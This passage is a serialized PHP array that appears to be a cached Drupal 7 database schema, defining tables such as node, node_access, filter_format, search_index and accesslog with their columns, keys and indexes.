keys\";a:1:{s:15:\"field_image_fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:15:\"field_image_fid\";s:3:\"fid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:22:\"field_data_field_image\";}s:26:\"field_revision_field_image\";a:6:{s:6:\"fields\";a:12:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:15:\"field_image_fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:15:\"field_image_alt\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:17:\"field_image_title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:17:\"field_image_width\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:18:\"field_image_height\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:15:\"field_image_fid\";a:1:{i:0;s:15:\"field_image_fid\";}}s:12:\"foreign keys\";a:1:{s:15:\"field_image_fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:15:\"field_image_fid\";s:3:\"fid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:26:\"field_revision_field_image\";}s:6:\"filter\";a:5:{s:6:\"fields\";a:6:{s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"settings\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"name\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:3:{i:0;s:6:\"weight\";i:1;s:6:\"module\";i:2;s:4:\"name\";}}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:6:\"filter\";}s:13:\"filter_format\";a:6:{s:6:\"fields\";a:5:{s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:5:\"cache\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:6:\"format\";}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:7:\"indexes\";a:1:{s:13:\"status_weight\";a:2:{i:0;s:6:\"status\";i:1;s:6:\"weight\";}}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:13:\"filter_format\";}s:12:\"cache_filter\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"cache_filter\";}s:11:\"cache_image\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"cache_image\";}s:12:\"image_styles\";a:5:{s:6:\"fields\";a:3:{s:4:\"isid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:5:\"label\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"isid\";}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:12:\"image_styles\";}s:13:\"image_effects\";a:6:{s:6:\"fields\";a:5:{s:4:\"ieid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"isid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"weight\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:0;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"ieid\";}s:7:\"indexes\";a:2:{s:4:\"isid\";a:1:{i:0;s:4:\"isid\";}s:6:\"weight\";a:1:{i:0;s:6:\"weight\";}}s:12:\"foreign keys\";a:1:{s:11:\"image_style\";a:2:{s:5:\"table\";s:12:\"image_styles\";s:7:\"columns\";a:1:{s:4:\"isid\";s:4:\"isid\";}}}s:6:\"module\";s:5:\"image\";s:4:\"name\";s:13:\"image_effects\";}s:11:\"menu_custom\";a:4:{s:6:\"fields\";a:3:{s:9:\"menu_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:12:\"translatable\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:9:\"menu_name\";}s:6:\"module\";s:4:\"menu\";s:4:\"name\";s:11:\"menu_custom\";}s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:11:\"node_access\";a:5:{s:6:\"fields\";a:6:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"gid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"realm\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"grant_view\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:12:\"grant_update\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:12:\"grant_delete\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:3:{i:0;s:3:\"nid\";i:1;s:3:\"gid\";i:2;s:5:\"realm\";}s:12:\"foreign keys\";a:1:{s:13:\"affected_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:11:\"node_access\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}s:9:\"node_type\";a:4:{s:6:\"fields\";a:13:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:4:\"base\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:6:\"medium\";s:12:\"translatable\";b:1;}s:4:\"help\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:6:\"medium\";s:12:\"translatable\";b:1;}s:9:\"has_title\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:4:\"size\";s:4:\"tiny\";}s:11:\"title_label\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:6:\"custom\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"modified\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"disabled\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"orig_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:9:\"node_type\";}s:15:\"block_node_type\";a:5:{s:6:\"fields\";a:3:{s:6:\"module\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"delta\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:3:{i:0;s:6:\"module\";i:1;s:5:\"delta\";i:2;s:4:\"type\";}s:7:\"indexes\";a:1:{s:4:\"type\";a:1:{i:0;s:4:\"type\";}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:15:\"block_node_type\";}s:7:\"history\";a:5:{s:6:\"fields\";a:3:{s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"uid\";i:1;s:3:\"nid\";}s:7:\"indexes\";a:1:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:7:\"history\";}s:11:\"rdf_mapping\";a:4:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:6:\"bundle\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:7:\"mapping\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:4:\"type\";i:1;s:6:\"bundle\";}s:6:\"module\";s:3:\"rdf\";s:4:\"name\";s:11:\"rdf_mapping\";}s:14:\"search_dataset\";a:4:{s:6:\"fields\";a:4:{s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:7:\"reindex\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"type\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:14:\"search_dataset\";}s:12:\"search_index\";a:6:{s:6:\"fields\";a:4:{s:4:\"word\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:50;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;}s:5:\"score\";a:2:{s:4:\"type\";s:5:\"float\";s:8:\"not null\";b:0;}}s:7:\"indexes\";a:1:{s:8:\"sid_type\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"type\";}}s:12:\"foreign keys\";a:1:{s:14:\"search_dataset\";a:2:{s:5:\"table\";s:14:\"search_dataset\";s:7:\"columns\";a:2:{s:3:\"sid\";s:3:\"sid\";s:4:\"type\";s:4:\"type\";}}}s:11:\"primary key\";a:3:{i:0;s:4:\"word\";i:1;s:3:\"sid\";i:2;s:4:\"type\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:12:\"search_index\";}s:12:\"search_total\";a:4:{s:6:\"fields\";a:2:{s:4:\"word\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:50;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"count\";a:2:{s:4:\"type\";s:5:\"float\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:1:{i:0;s:4:\"word\";}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:12:\"search_total\";}s:17:\"search_node_links\";a:5:{s:6:\"fields\";a:4:{s:3:\"sid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:16;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"caption\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:3:{i:0;s:3:\"sid\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:7:\"indexes\";a:1:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:6:\"module\";s:6:\"search\";s:4:\"name\";s:17:\"search_node_links\";}s:12:\"shortcut_set\";a:5:{s:6:\"fields\";a:2:{s:8:\"set_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:8:\"set_name\";}s:12:\"foreign keys\";a:1:{s:9:\"menu_name\";a:2:{s:5:\"table\";s:10:\"menu_links\";s:7:\"columns\";a:1:{s:8:\"set_name\";s:9:\"menu_name\";}}}s:6:\"module\";s:8:\"shortcut\";s:4:\"name\";s:12:\"shortcut_set\";}s:18:\"shortcut_set_users\";a:6:{s:6:\"fields\";a:2:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"set_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:7:\"indexes\";a:1:{s:8:\"set_name\";a:1:{i:0;s:8:\"set_name\";}}s:12:\"foreign keys\";a:2:{s:8:\"set_user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}s:8:\"set_name\";a:2:{s:5:\"table\";s:12:\"shortcut_set\";s:7:\"columns\";a:1:{s:8:\"set_name\";s:8:\"set_name\";}}}s:6:\"module\";s:8:\"shortcut\";s:4:\"name\";s:18:\"shortcut_set_users\";}s:9:\"accesslog\";a:6:{s:6:\"fields\";a:9:{s:3:\"aid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"sid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:4:\"path\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:3:\"url\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;}s:8:\"hostname\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:0;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";i:0;}s:5:\"timer\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:19:\"accesslog_timestamp\";a:1:{i:0;s:9:\"timestamp\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:12:\"foreign keys\";a:1:{s:7:\"visitor\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:10:\"statistics\";s:4:\"name\";s:9:\"accesslog\";}s:12:\"node_counter\";a:4:{s:6:\"fields\";a:4:{s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"totalcount\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:3:\"big\";}s:8:\"daycount\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:6:\"medium\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:10:\"statistics\";s:4:\"name\";s:12:\"node_counter\";}s:8:\"variable\";a:4:{s:6:\"fields\";a:2:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"value\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"name\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"variable\";}s:7:\"actions\";a:4:{s:6:\"fields\";a:5:{s:3:\"aid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not 